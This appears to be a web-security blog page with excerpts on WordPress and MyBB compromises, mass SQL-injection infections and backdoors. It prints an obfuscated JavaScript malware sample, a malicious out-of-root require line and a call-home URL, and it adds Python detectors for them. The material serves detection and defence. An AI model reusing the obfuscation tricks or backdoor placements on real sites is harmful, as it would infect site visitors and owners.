Timthumb.php Mass Infection – Aftermath – Part I

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to have metrics on the number of sites that were truly affected; the problem is that it’s very hard to estimate how many sites were in fact compromised. One thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.

Read More

MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, especially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site was hacked and the software download packages were compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommends these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder.

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Remove Unused/Testing/Debug Software From Your Site

We constantly see sites hacked due to vulnerabilities in various tools. In most cases, site owners don’t even realize they are there, or don’t even remember they were installed.

Higher Risk for Issues

For example, a site owner/manager has to make a quick modification in the database and installs phpMyAdmin; a few months (or even years) later, their site gets hacked through a vulnerability discovered in phpMyAdmin.

Read More

Evil backdoors – Part II

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see people on online forums recommending searching for “eval ( base64_decode” and things like that when looking for backdoors. If you review the examples in that article, you can see that such a search would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

Read More

Mass infections from jjghui.com/urchin.js (SQL injection)

We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).

According to Google, almost 1.5k sites have been blacklisted already due to it, and there are 80k+ pages in Google’s index carrying JavaScript malware pointing to it.

What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:

Read More

Malware on /etc/mailquota

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, the attackers have been adding the following code to wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . "/../etc/mailquota");
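A static check for both of the core-file modifications described on this page: the call-home added to wp-settings.php in the timthumb post above, and the require of a file outside the site root in wp-config.php shown here. This is an added example, not Sucuri’s code; the two PHP samples it scans are constructed for the example (the function name in the wp-settings.php sample is hypothetical, the URL is the one named in the timthumb post), the site root path is assumed, and the rule that a bare-IP URL never belongs in a WordPress core file is this example’s own heuristic.

```python
import posixpath
import re

# Constructed sample of a wp-config.php carrying the out-of-root require the
# post describes (written for this example, not taken from a real site).
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('ABSPATH', dirname(__FILE__) . '/');
require( ABSPATH . "/../etc/mailquota");
require_once(ABSPATH . 'wp-settings.php');
"""

# Constructed sample of a wp-settings.php with a call-home to the URL named in
# the timthumb post; the function name is hypothetical.
SAMPLE_WP_SETTINGS = """<?php
function wp_check_remote_update() {
    return @file_get_contents("http://91.196.216.30/bt.php?h=" . $_SERVER['HTTP_HOST']);
}
require( ABSPATH . WPINC . '/load.php' );
"""

# One include/require statement; group 1 is the argument expression up to ';'.
INCLUDE_RE = re.compile(
    r'\b(?:require|include)(?:_once)?\s*\(?\s*([^;]+?)\s*\)?\s*;', re.I)
# String literals, PHP variables and bare identifiers inside that expression.
TOKEN_RE = re.compile(r'''"([^"]*)"|'([^']*)'|(\$\w+|\b[A-Za-z_]\w*)''')
# A URL whose host is a bare IPv4 address (heuristic: core files never do this).
IP_URL_RE = re.compile(r'https?://\d{1,3}(?:\.\d{1,3}){3}[^\s"\']*')


def resolve_include(expr, abspath):
    """Evaluate a simple PHP path expression: string literals joined with '.',
    plus the ABSPATH and WPINC constants. Returns None if the expression uses
    a variable, a function call or an unknown constant (not statically known)."""
    pieces = []
    for dq, sq, ident in TOKEN_RE.findall(expr):
        if ident == "ABSPATH":
            pieces.append(abspath)
        elif ident == "WPINC":
            pieces.append("wp-includes")
        elif ident:
            return None
        else:
            pieces.append(dq or sq)
    return posixpath.normpath("".join(pieces))


def scan_php(source, abspath="/home/user/public_html/"):
    """Return (kind, detail) findings: includes resolving outside the site
    root, includes that cannot be resolved statically, and bare-IP URLs."""
    root = abspath.rstrip("/") + "/"
    findings = []
    for m in INCLUDE_RE.finditer(source):
        expr = m.group(1)
        resolved = resolve_include(expr, root)
        if resolved is None:
            findings.append(("dynamic-include", expr))
        elif not resolved.startswith(root):
            findings.append(("include-outside-root", resolved))
    for url in IP_URL_RE.findall(source):
        findings.append(("ip-url", url))
    return findings


if __name__ == "__main__":
    samples = (("wp-config.php", SAMPLE_WP_CONFIG),
               ("wp-settings.php", SAMPLE_WP_SETTINGS))
    for name, src in samples:
        for kind, detail in scan_php(src):
            print(f"{name}: {kind}: {detail}")
```

Run it over the real files with `scan_php(open(path).read(), abspath=<site root>)`. The `/../etc/mailquota` require resolves to a path above the site root and is reported, while the stock `wp-settings.php` and `wp-includes/load.php` requires stay silent; anything built from a variable is reported as a dynamic include for manual review, since it cannot be resolved without running the PHP.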


Read More

Malware Infections from rebotstat dot com

We are starting to share some of our research and view of web-based malware online: http://sucuri.net/global. The #1 infection we are seeing in the last few days is caused by a heavily encoded piece of JavaScript malware:

<!-- o --><script>b=new function(){return 2;};if(!+b)String&#46prototype&#46vqwfbeweb='h'+'arC';
for(i in $='b4h3tbn')if(i=='vqwfbeweb')m=$[i];try{new Object()&#46wehweh();}catch(q){ss="";}
try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}
d=new Date();d2=new Date(d&#46valueOf()-2);Object&#46prototype&#46asd='e';
if({}&#46asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');
if(a&#46data==321)x=-1*(d-d2);
n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,..
for(i=0;i<n&#46length;i++)ss +=s(e val("n"+"[i"+"]"));
if(!+b) e val(ss);</script><!-- c -->
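The sample above is hard for string-signature scanners because none of the usual tokens (`eval`, `fromCharCode`, `prototype`) appear in plain form. A heuristic that scores a page on the obfuscation tricks visible in this sample, rather than on any one string, is shown below as an added example that is not Sucuri’s code: the two snippets it scores are constructed for the example (the malicious one reuses the tricks of the sample above, including `&#46` for `.` and `eval` split as `e val`, as the post renders it), and the threshold of three distinct tricks is this example’s own choice.

```python
import re

# Each regex names one trick taken from the rebotstat sample.
INDICATORS = {
    # "." written as an HTML entity so "prototype"/"length" never appear as text
    "entity-dot": re.compile(r"&#46;?\w"),
    # a sensitive name assembled from short concatenated fragments: "fr"+"omC"
    "split-string": re.compile(r"""(['"])\w{1,4}\1\s*\+\s*(['"])\w{1,4}\2"""),
    # window['e'+'v'+'al'] / String["fr"+...]: bracket access with a built-up key
    "bracket-call": re.compile(r"""\b(?:window|String|document)\s*\[\s*['"]"""),
    # character codes hidden behind a runtime-derived offset: -x+103,-x+100,...
    "offset-array": re.compile(r"(?:-\w\+\d+\s*,\s*){3,}"),
    # eval, also when split by whitespace as in the post's rendering
    "eval": re.compile(r"\be\s?val\b"),
}

# Constructed malicious snippet patterned on the sample above (not live malware).
MALICIOUS_SAMPLE = """<script>if(!+b)String&#46prototype&#46q='h'+'arC';
s=String["fr"+"omC"+m+"od"+'e'];x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100];
for(i=0;i<n&#46length;i++)ss+=s(e val("n"+"[i"+"]"));if(!+b) e val(ss);</script>"""

# Constructed benign snippet: ordinary DOM code with string concatenation.
BENIGN_SAMPLE = """<script>document.getElementById('nav').className = 'open';
var total = items.length + 1; console.log('ready: ' + total);</script>"""


def obfuscation_indicators(text):
    """Count how often each trick occurs in the given HTML/JavaScript text."""
    return {name: len(rx.findall(text)) for name, rx in INDICATORS.items()}


def is_suspicious(text, min_kinds=3):
    """Flag text in which at least min_kinds distinct tricks occur; requiring
    several kinds keeps minified but honest code from tripping the check."""
    counts = obfuscation_indicators(text)
    return sum(1 for c in counts.values() if c) >= min_kinds


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, obfuscation_indicators(sample), is_suspicious(sample))
```

The counts are what to look at when tuning: a single `"a"+"b"` concatenation is common in legitimate scripts, so it only contributes once other tricks (the entity-encoded dots, the offset array, the bracketed `eval`) also appear in the same page.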


Read More